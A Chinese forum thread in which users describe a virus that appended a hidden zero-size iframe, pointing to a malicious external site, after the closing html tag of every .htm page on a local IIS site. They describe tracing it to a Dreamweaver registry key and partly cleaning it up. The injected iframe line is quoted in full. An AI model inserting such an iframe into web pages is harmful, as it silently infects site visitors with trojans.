[病毒]某毒对本地网页进行了篡改...

victorstrife

条件: 本地IIS装载页面,有网络条件,中毒后假如浏览本地网页,整个站点下的htm文件全部被篡改——在每个网页的</html>标签后面加了 "<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>".
之后只要任何人打开这个站点的任何页面就会中好几个木马.

对于能篡改网页代码的病毒,在下还是第一次遇到,在网上查了下,貌似也没什么真正有效的方法.

最后只好从注册表找找原因了...找到了这个:
HKEY_CURRENT_USER\Software\Macromedia\Dreamweaver 8\Find And Replace
里面被改成上面那个恶意网站的地址相关信息了...

最后缓冲临时文件什么一次过清除,再将网页替换掉才勉强解决了,不过还有个东西未解决...Pket.exe...打开网页的状态下隔一段时间就会出来...进程无异常...

不过无所谓了,反正不影响使用就得了...

重生の红狼

希望对喜欢自己做站的朋友有所帮助.

其实病毒也是程序,也拥有字符搜索,文本读取的功能.想到这点也就不会感到奇怪了.

victorstrife

该毒是会篡改你硬盘上所有网页文件...
不过貌似都是些htm...asp那些就不清楚了...
今天检查处理了一个上午...

victorstrife

用DW新建立静态页面会在</html>后面生成上面所说的那个恶意链接...卸载重装可以解决.